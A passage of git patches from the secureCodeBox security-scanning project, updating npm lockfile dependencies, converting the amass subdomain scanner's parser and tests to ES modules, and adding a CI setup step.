"https://registry.npmjs.org/simple-concat/-/simple-concat-1.0.1.tgz", + "integrity": "sha512-cSFtAPtRhljv69IK0hTVZQ+OfE9nePi/rtJmw5UjHeVyVroEqJXP1sFztKUy1qU+xvz3u/sfYJLa947b7nAN2Q==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "license": "MIT" + }, + "node_modules/simple-get": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/simple-get/-/simple-get-4.0.1.tgz", + "integrity": "sha512-brv7p5WgH0jmQJr1ZDDfKDOSeWWg+OVypG99A/5vYGPqJ6pxiaHLy8nxtFjBA7oMa01ebA9gfh1uMCFqOuXxvA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "license": "MIT", + "dependencies": { + "decompress-response": "^6.0.0", + "once": "^1.3.1", + "simple-concat": "^1.0.0" + } }, "node_modules/smart-buffer": { "version": "4.2.0", @@ -913,16 +1137,17 @@ } }, "node_modules/socks": { - "version": "2.7.1", - "resolved": "https://registry.npmjs.org/socks/-/socks-2.7.1.tgz", - "integrity": "sha512-7maUZy1N7uo6+WVEX6psASxtNlKaNVMlGQKkG/63nEDdLOWNbiUMoLK7X4uYoLhQstau72mLgfEWcXcwsaHbYQ==", + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", + "license": "MIT", "optional": true, "dependencies": { - "ip": "^2.0.0", + "ip-address": "^9.0.5", "smart-buffer": "^4.2.0" }, "engines": { - "node": ">= 10.13.0", + "node": ">= 10.0.0", "npm": ">= 3.0.0" } }, @@ -940,14 +1165,23 @@ "node": ">= 10" } }, + "node_modules/sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", + "license": "BSD-3-Clause", + "optional": true + }, "node_modules/sqlite3": { - "version": "5.1.6", - "resolved": "https://registry.npmjs.org/sqlite3/-/sqlite3-5.1.6.tgz", - "integrity": "sha512-olYkWoKFVNSSSQNvxVUfjiVbz3YtBwTJj+mfV5zpHmqW3sELx2Cf4QCdirMelhM5Zh+KDVaKgQHqCxrqiWHybw==", + "version": "5.1.7", + "resolved": "https://registry.npmjs.org/sqlite3/-/sqlite3-5.1.7.tgz", + "integrity": "sha512-GGIyOiFaG+TUra3JIfkI/zGP8yZYLPQ0pl1bH+ODjiX57sPhrLU5sQJn1y9bDKZUFYkX1crlrPfSYt0BKKdkog==", "hasInstallScript": true, + "license": "BSD-3-Clause", "dependencies": { - "@mapbox/node-pre-gyp": "^1.0.0", - "node-addon-api": "^4.2.0", + "bindings": "^1.5.0", + "node-addon-api": "^7.0.0", + "prebuild-install": "^7.1.1", "tar": "^6.1.11" }, "optionalDependencies": { @@ -986,6 +1220,7 @@ "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "optional": true, "dependencies": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", @@ -999,6 +1234,7 @@ "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "optional": true, "dependencies": { "ansi-regex": "^5.0.1" }, @@ -1006,6 +1242,15 @@ "node": ">=8" } }, + "node_modules/strip-json-comments": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-2.0.1.tgz", + "integrity": "sha512-4gB8na07fecVVkOI6Rs4e7T6NOTki5EmL7TUduTs6bu3EdnSycntVJ4re8kgZA+wx9IueI2Y11bfbgwtzuE0KQ==", + "license": "MIT", + "engines": { + "node": ">=0.10.0" + } + }, "node_modules/tar": { "version": "6.2.1", "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", @@ -1022,6 +1267,40 @@ "node": ">=10" } }, + "node_modules/tar-fs": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-2.1.3.tgz", + "integrity": "sha512-090nwYJDmlhwFwEW3QQl+vaNnxsO2yVsd45eTKRBzSzu+hlb1w2K9inVq5b0ngXuLVqQ4ApvsUHHnu/zQNkWAg==", + "license": "MIT", + "dependencies": { + "chownr": "^1.1.1", + "mkdirp-classic": "^0.5.2", + "pump": "^3.0.0", + "tar-stream": "^2.1.4" + } + }, + "node_modules/tar-fs/node_modules/chownr": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.4.tgz", + "integrity": "sha512-jJ0bqzaylmJtVnNgzTeSOs8DPavpbYgEr/b0YL8/2GO3xJEhInFmhKMUnEJQjZumK7KXGFhUy89PrsJWlakBVg==", + "license": "ISC" + }, + "node_modules/tar-stream": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-2.2.0.tgz", + "integrity": "sha512-ujeqbceABgwMZxEJnk2HDY2DlnUZ+9oEcb1KzTVfYHio0UE6dG71n60d8D2I4qNvleWrrXpmjpt7vZeF1LnMZQ==", + "license": "MIT", + "dependencies": { + "bl": "^4.0.3", + "end-of-stream": "^1.4.1", + "fs-constants": "^1.0.0", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1" + }, + "engines": { + "node": ">=6" + } + }, "node_modules/tar/node_modules/minipass": { "version": "5.0.0", "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", @@ -1030,10 +1309,17 @@ "node": ">=8" } }, - "node_modules/tr46": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", - "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" + "node_modules/tunnel-agent": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", + "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", + "license": "Apache-2.0", + "dependencies": { + "safe-buffer": "^5.0.1" + }, + "engines": { + "node": "*" + } }, "node_modules/unique-filename": { "version": "1.1.1", @@ -1058,20 +1344,6 @@ "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, - "node_modules/webidl-conversions": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", - "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" - }, - "node_modules/whatwg-url": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", - "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", - "dependencies": { - "tr46": "~0.0.3", - "webidl-conversions": "^3.0.0" - } - }, "node_modules/which": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", @@ -1091,6 +1363,7 @@ "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", + "optional": true, "dependencies": { "string-width": "^1.0.2 || 2 || 3 || 4" } diff --git a/scanners/amass/parser/package.json b/scanners/amass/parser/package.json index 9c48601b9f..45c118406f 100644 --- a/scanners/amass/parser/package.json +++ b/scanners/amass/parser/package.json @@ -8,9 +8,7 @@ "author": "iteratec GmbH", "license": "Apache-2.0", "dependencies": { - "sqlite3": "^5.1.6" + "sqlite3": "^5.1.7" }, "devDependencies": {} - } - - +} \ No newline at end of file diff --git a/scanners/amass/parser/parser.js b/scanners/amass/parser/parser.js index b248ccb05d..e42343e649 100644 --- a/scanners/amass/parser/parser.js +++ b/scanners/amass/parser/parser.js @@ -39,7 +39,7 @@ async function openDatabase(fileContent) { reject(err.message); return; } - } + }, ); resolve(db); }); diff --git a/scanners/amass/parser/parser.test.js b/scanners/amass/parser/parser.test.js index d8af5b4119..d69a1dedc2 100644 --- a/scanners/amass/parser/parser.test.js +++ b/scanners/amass/parser/parser.test.js @@ -2,9 +2,9 @@ // // SPDX-License-Identifier: Apache-2.0 -const {readFile} = require("node:fs/promises"); +const { readFile } = require("node:fs/promises"); -const {parse} = require("./parser"); +const { parse } = require("./parser"); const { validateParser, @@ -12,7 +12,7 @@ const { test("parser parses example.com sqlite results database successfully", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/example.com.sqlite" + __dirname + "/__testFiles__/example.com.sqlite", ); const findings = await parse(fileContent); @@ -22,7 +22,7 @@ test("parser parses example.com sqlite results database successfully", async () test("parser parses sqlite results database with empty tables successfully", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/emptyTables.sqlite" + __dirname + "/__testFiles__/emptyTables.sqlite", ); const findings = await parse(fileContent); @@ -32,7 +32,7 @@ test("parser parses sqlite results database with empty tables successfully", asy test("parser parses sqlite results database with no tables successfully", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/noTables.sqlite" + __dirname + "/__testFiles__/noTables.sqlite", ); const findings = await parse(fileContent); @@ -42,7 +42,7 @@ test("parser parses sqlite results database with no tables successfully", async test("parser parses sqlite results database with empty relations table successfully", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/emptyRelations.sqlite" + __dirname + "/__testFiles__/emptyRelations.sqlite", ); const findings = await parse(fileContent); From be76fd9afe9a7739fce8f7e894272a7d692e4830 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 16 Jun 2025 20:33:59 +0200 Subject: [PATCH 014/137] Update amass to esm Signed-off-by: Jannik Hollenbach --- .../amass/integration-tests/amass.test.js | 10 +++--- scanners/amass/parser/parser.js | 32 ++++++++----------- scanners/amass/parser/parser.test.js | 17 ++++------ 3 files changed, 26 insertions(+), 33 deletions(-) diff --git a/scanners/amass/integration-tests/amass.test.js b/scanners/amass/integration-tests/amass.test.js index e611fa18a2..6dc66e6108 100644 --- a/scanners/amass/integration-tests/amass.test.js +++ b/scanners/amass/integration-tests/amass.test.js @@ -2,8 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "amass should find at least 20 subdomains", @@ -14,7 +13,10 @@ test( ["-norecursive", "-timeout", "1", "-d", "owasp.org"], 180, ); - expect(count).toBeGreaterThanOrEqual(100); // The scan is passive, so we can expect a lot of subdomains + expect(count).toBeGreaterThanOrEqual(20); // The scan is passive, so we can expect a lot of subdomains + }, + { + timeout: 10 * 60 * 1000, + retry: 5, }, - 10 * 60 * 1000, ); diff --git a/scanners/amass/parser/parser.js b/scanners/amass/parser/parser.js index e42343e649..d2892c47f9 100644 --- a/scanners/amass/parser/parser.js +++ b/scanners/amass/parser/parser.js @@ -2,10 +2,10 @@ // // SPDX-License-Identifier: Apache-2.0 -const sqlite3 = require("sqlite3").verbose(); -const fs = require("node:fs/promises"); -const path = require("node:path"); -const os = require("node:os"); +import { Database, OPEN_READONLY } from "sqlite3"; +import { writeFile } from "node:fs/promises"; +import { join } from "node:path"; +import { tmpdir } from "node:os"; async function checkIfTableExists(db) { const query = `select count(*) from sqlite_master m where m.name="assets" OR m.name="relations"`; @@ -26,21 +26,17 @@ function queryAll(db, query) { } async function openDatabase(fileContent) { - const tempFilePath = path.join(os.tmpdir(), "temp-sqlite" + ".sqlite"); + const tempFilePath = join(tmpdir(), "temp-sqlite" + ".sqlite"); // Write the content to a temporary file - await fs.writeFile(tempFilePath, fileContent); + await writeFile(tempFilePath, fileContent); return await new Promise((resolve, reject) => { - const db = new sqlite3.Database( - tempFilePath, - sqlite3.OPEN_READONLY, - (err) => { - if (err) { - reject(err.message); - return; - } - }, - ); + const db = new Database(tempFilePath, OPEN_READONLY, (err) => { + if (err) { + reject(err.message); + return; + } + }); resolve(db); }); } @@ -56,7 +52,7 @@ function closeDatabase(db) { }); } -async function parse(fileContent) { +export async function parse(fileContent) { const db = await openDatabase(fileContent); const tableExists = await checkIfTableExists(db); if (!tableExists) return []; @@ -128,5 +124,3 @@ async function parse(fileContent) { }; }); } - -module.exports.parse = parse; diff --git a/scanners/amass/parser/parser.test.js b/scanners/amass/parser/parser.test.js index d69a1dedc2..cfc3e5d02b 100644 --- a/scanners/amass/parser/parser.test.js +++ b/scanners/amass/parser/parser.test.js @@ -2,17 +2,14 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("node:fs/promises"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); - -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { parse } from "./parser"; test("parser parses example.com sqlite results database successfully", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/example.com.sqlite", + import.meta.dirname + "/__testFiles__/example.com.sqlite", ); const findings = await parse(fileContent); @@ -22,7 +19,7 @@ test("parser parses example.com sqlite results database successfully", async () test("parser parses sqlite results database with empty tables successfully", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/emptyTables.sqlite", + import.meta.dirname + "/__testFiles__/emptyTables.sqlite", ); const findings = await parse(fileContent); @@ -32,7 +29,7 @@ test("parser parses sqlite results database with empty tables successfully", asy test("parser parses sqlite results database with no tables successfully", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/noTables.sqlite", + import.meta.dirname + "/__testFiles__/noTables.sqlite", ); const findings = await parse(fileContent); @@ -42,7 +39,7 @@ test("parser parses sqlite results database with no tables successfully", async test("parser parses sqlite results database with empty relations table successfully", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/emptyRelations.sqlite", + import.meta.dirname + "/__testFiles__/emptyRelations.sqlite", ); const findings = await parse(fileContent); From 0810d29c4dd402e6c52dd8ce839d328d404ac3b7 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 16 Jun 2025 20:42:01 +0200 Subject: [PATCH 015/137] Setup proper linking for the parser-sdk from the unit tests Linking is done using the parser-sdk local file link from the scanners/ directory Signed-off-by: Jannik Hollenbach --- .github/workflows/ci.yaml | 4 + scanners/package-lock.json | 7563 +----------------------------------- scanners/package.json | 13 +- 3 files changed, 22 insertions(+), 7558 deletions(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 4ccdaed368..035c5aacd2 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -478,6 +478,10 @@ jobs: working-directory: ./parser-sdk/nodejs/ run: bun install + - name: Setup parser-sdk for unit tests + working-directory: ./scanners/ + run: bun install + - name: Install Dependencies working-directory: ./scanners/${{ matrix.unit }}/parser/ #install dependencies for the parser if the directory has a package.json diff --git a/scanners/package-lock.json b/scanners/package-lock.json index a1b15fd8af..9d737f8e0b 100644 --- a/scanners/package-lock.json +++ b/scanners/package-lock.json @@ -9,12 +9,7 @@ "version": "1.0.0", "license": "Apache-2.0", "devDependencies": { - "@kubernetes/client-node": "^0.19.0", - "@securecodebox/parser-sdk-nodejs": "file:../parser-sdk/nodejs", - "@types/jest": "^29.5.14", - "jest": "^29.7.0", - "prettier": "^3.4.2", - "ts-jest": "^29.2.5" + "@securecodebox/parser-sdk-nodejs": "file:../parser-sdk/nodejs" } }, "../parser-sdk/nodejs": { @@ -23,7558 +18,28 @@ "dev": true, "license": "Apache-2.0", "dependencies": { - "@kubernetes/client-node": "^0.22.3", + "@kubernetes/client-node": "^1.3.0", "ajv": "^8.17.1", "ajv-draft-04": "^1.0.0", "ajv-formats": "^3.0.1", - "axios": "^1.7.8", - "jsonpointer": "^5.0.1", - "ws": "^8.13.0" - } - }, - "node_modules/@ampproject/remapping": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.0.tgz", - "integrity": "sha512-qRmjj8nj9qmLTQXXmaR1cck3UXSRMPrbsLJAasZpF+t3riI71BXed5ebIOYwQntykeZuhjsdweEc9BxH5Jc26w==", - "dev": true, - "dependencies": { - "@jridgewell/gen-mapping": "^0.1.0", - "@jridgewell/trace-mapping": "^0.3.9" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/code-frame": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.26.2.tgz", - "integrity": "sha512-RJlIHRueQgwWitWgF8OdFYGZX328Ax5BCemNGlqHfplnRT9ESi8JkFlvaVYbS+UubVY6dpv87Fs2u5M29iNFVQ==", - "dev": true, - "dependencies": { - "@babel/helper-validator-identifier": "^7.25.9", - "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/compat-data": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.26.2.tgz", - "integrity": "sha512-Z0WgzSEa+aUcdiJuCIqgujCshpMWgUpgOxXotrYPSA53hA3qopNaqcJpyr0hVb1FeWdnqFA35/fUtXgBK8srQg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/core": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.26.0.tgz", - "integrity": "sha512-i1SLeK+DzNnQ3LL/CswPCa/E5u4lh1k6IAEphON8F+cXt0t9euTshDru0q7/IqMa1PMPz5RnHuHscF8/ZJsStg==", - "dev": true, - "dependencies": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.26.0", - "@babel/generator": "^7.26.0", - "@babel/helper-compilation-targets": "^7.25.9", - "@babel/helper-module-transforms": "^7.26.0", - "@babel/helpers": "^7.26.0", - "@babel/parser": "^7.26.0", - "@babel/template": "^7.25.9", - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.26.0", - "convert-source-map": "^2.0.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.3", - "semver": "^6.3.1" - }, - "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" - } - }, - "node_modules/@babel/generator": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.26.2.tgz", - "integrity": "sha512-zevQbhbau95nkoxSq3f/DC/SC+EEOUZd3DYqfSkMhY2/wfSeaHV1Ew4vk8e+x8lja31IbyuUa2uQ3JONqKbysw==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.26.2", - "@babel/types": "^7.26.0", - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.25", - "jsesc": "^3.0.2" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/generator/node_modules/@jridgewell/gen-mapping": { - "version": "0.3.5", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", - "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.2.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.24" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.25.9.tgz", - "integrity": "sha512-j9Db8Suy6yV/VHa4qzrj9yZfZxhLWQdVnRlXxmKLYlhWUVB1sB2G5sxuWYXk/whHD9iW76PmNzxZ4UCnTQTVEQ==", - "dev": true, - "dependencies": { - "@babel/compat-data": "^7.25.9", - "@babel/helper-validator-option": "^7.25.9", - "browserslist": "^4.24.0", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-compilation-targets/node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/@babel/helper-compilation-targets/node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/@babel/helper-module-imports": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.25.9.tgz", - "integrity": "sha512-tnUA4RsrmflIM6W6RFTLFSXITtl0wKjgpnLgXyowocVPrbYrLUXSBXDgTs8BlbmIzIdlBySRQjINYs2BAkiLtw==", - "dev": true, - "dependencies": { - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.26.0.tgz", - "integrity": "sha512-xO+xu6B5K2czEnQye6BHA7DolFFmS3LB7stHZFaOLb1pAwO1HWLS8fXA+eh0A2yIvltPVmx3eNNDBJA2SLHXFw==", - "dev": true, - "dependencies": { - "@babel/helper-module-imports": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9", - "@babel/traverse": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.25.9.tgz", - "integrity": "sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-string-parser": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.25.9.tgz", - "integrity": "sha512-4A/SCr/2KLd5jrtOMFzaKjVtAei3+2r/NChoBNoZ3EyP/+GlhoaEGoWOZUmFmoITP7zOJyHIMm+DYRd8o3PvHA==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.25.9.tgz", - "integrity": "sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-option": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.25.9.tgz", - "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helpers": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.26.0.tgz", - "integrity": "sha512-tbhNuIxNcVb21pInl3ZSjksLCvgdZy9KwJ8brv993QtIVKJBBkYXz4q4ZbAv31GdnC+R90np23L5FbEBlthAEw==", - "dev": true, - "dependencies": { - "@babel/template": "^7.25.9", - "@babel/types": "^7.26.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/parser": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.26.2.tgz", - "integrity": "sha512-DWMCZH9WA4Maitz2q21SRKHo9QXZxkDsbNZoVD62gusNtNBBqDg9i7uOhASfTfIGNzW+O+r7+jAlM8dwphcJKQ==", - "dev": true, - "dependencies": { - "@babel/types": "^7.26.0" - }, - "bin": { - "parser": "bin/babel-parser.js" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.25.9.tgz", - "integrity": "sha512-ld6oezHQMZsZfp6pWtbjaNDF2tiiCYYDqQszHt5VV437lewP9aSi2Of99CK0D0XB21k7FLgnLcmQKyKzynfeAA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - 